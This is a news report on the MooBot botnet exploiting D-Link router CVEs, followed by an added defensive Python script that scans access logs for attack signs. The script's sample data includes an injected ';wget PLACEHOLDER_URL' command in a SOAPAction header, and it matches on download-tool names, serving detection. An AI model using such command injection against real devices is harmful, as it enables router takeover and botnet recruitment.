The Mirai malware botnet variant known as ‘MooBot’ has re-emerged in a new attack wave that started early last month, targeting vulnerable D-Link routers with a mix of old and new exploits. MooBot was discovered by analysts at Fortinet in December 2021, targeting a flaw in Hikvision cameras to spread quickly and enlist many devices into its DDoS (distributed denial of service) army. Today, the malware has refreshed its targeting scope, which is typical for botnets looking for untapped pools of vulnerable devices they can ensnare. According to a report compiled by Palo Alto Networks’ Unit 42 researchers, MooBot is now targeting the following critical vulnerabilities in D-Link devices:
- CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258: D-Link Remote Command Execution Vulnerability
- CVE-2022-28958: D-Link Remote Command Execution Vulnerability
The vendor has released security updates to address these flaws, but not all users have applied the patches yet, especially for the last two, which became known in March and May this year. MooBot’s operators leverage the low attack complexity of the flaws to gain remote code execution on the targets and fetch the malware binary using arbitrary commands. After the malware decodes the hardcoded address from its configuration, the newly captured routers are registered on the threat actor’s C2. Eventually, the captured routers participate in directed DDoS attacks against various targets; typically, the threat actors sell DDoS services to anyone interested in causing downtime or disruption to sites and online services.
Users of compromised D-Link devices may notice internet speed drops, unresponsiveness, router overheating, or inexplicable DNS configuration changes, all common signs of botnet infections. The best way to shut the door to MooBot is to apply the available firmware updates on all D-Link routers. Older, unsupported devices should be configured to prevent remote access to the admin panel. If the D-Link device has been compromised already, administrators should perform a reset from the corresponding physical button, change the admin password, and then install the latest security updates from the vendor. It’s important to note that the C2 addresses presented in Unit 42’s report differ from those in Fortinet’s write-up, indicating a refresh in the threat actor’s infrastructure.
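The infection chain above (a management-interface request carrying a command, followed by a fetch of the binary) and the advice to keep the admin panel off the internet both translate into checks a defender can run over router or reverse-proxy access logs. The following Python is an added example, not code from the article, Unit 42 or Fortinet. It assumes a simple constructed log format (`<src_ip> <method> <path> soapaction=<value-or-dash>`), assumes that legitimate HNAP SOAPAction values are plain action names under the `http://purenetworks.com/HNAP1/` namespace, and uses a fictitious `PLACEHOLDER_URL` in the sample suspicious line; the LAN ranges are the RFC 1918 networks and should be adjusted to the real management network.

```python
import ipaddress
import re

# Networks from which management access is expected (RFC 1918; adjust to your LAN).
LAN_NETS = [ipaddress.ip_network(n) for n in ("192.168.0.0/16", "10.0.0.0/8", "172.16.0.0/12")]

# Allowlist for well-formed HNAP SOAPAction values: namespace prefix plus a bare
# action name. The namespace prefix is an assumption made for this example.
HNAP_ACTION_RE = re.compile(r'^"?http://purenetworks\.com/HNAP1/[A-Za-z0-9_]+"?$')

# Download utilities that have no business appearing in a router management request.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)

# Assumed (constructed) log format: <src_ip> <method> <path> soapaction=<value-or-dash>
LINE_RE = re.compile(r"^(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+soapaction=(?P<action>.*)$")

# Constructed sample lines; the command fragment uses a fictitious placeholder URL.
SAMPLE_LOG = [
    '192.168.0.23 POST /HNAP1/ soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings"',
    '203.0.113.77 POST /HNAP1/ soapaction="http://purenetworks.com/HNAP1/Login"',
    '203.0.113.77 POST /HNAP1/ soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/;wget PLACEHOLDER_URL"',
    "192.168.0.23 GET /index.html soapaction=-",
]


def from_lan(ip):
    """True if the source address falls inside one of the expected management networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in LAN_NETS)


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def inspect(line):
    """Return the list of reasons a request looks suspicious (empty list means clean)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparsable line"]
    reasons = []
    # Admin panel reached from outside the LAN: the exposure the article says to close.
    if rec["path"].startswith("/HNAP1") and not from_lan(rec["src"]):
        reasons.append("management interface reached from non-LAN address")
    # SOAPAction that is not a plain action name: anything appended after the action
    # is not something a legitimate client sends.
    if rec["action"] != "-" and not HNAP_ACTION_RE.match(rec["action"]):
        reasons.append("SOAPAction outside HNAP allowlist")
    # A download utility named anywhere in the request matches the 'fetch the binary' stage.
    if FETCH_RE.search(line):
        reasons.append("download utility name in request")
    return reasons


def scan(lines):
    """Run inspect() over every line and return (line_number, reasons) for the flagged ones."""
    findings = []
    for number, line in enumerate(lines, start=1):
        reasons = inspect(line)
        if reasons:
            findings.append((number, reasons))
    return findings


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

The allowlist approach is deliberate: rather than enumerating injection characters, it treats any SOAPAction value that is not a bare action name as anomalous, so it does not need updating for each new command-injection variant. Line 2 of the sample is flagged only for its non-LAN source, which is the signal that remote management is still exposed even before any exploitation attempt shows up.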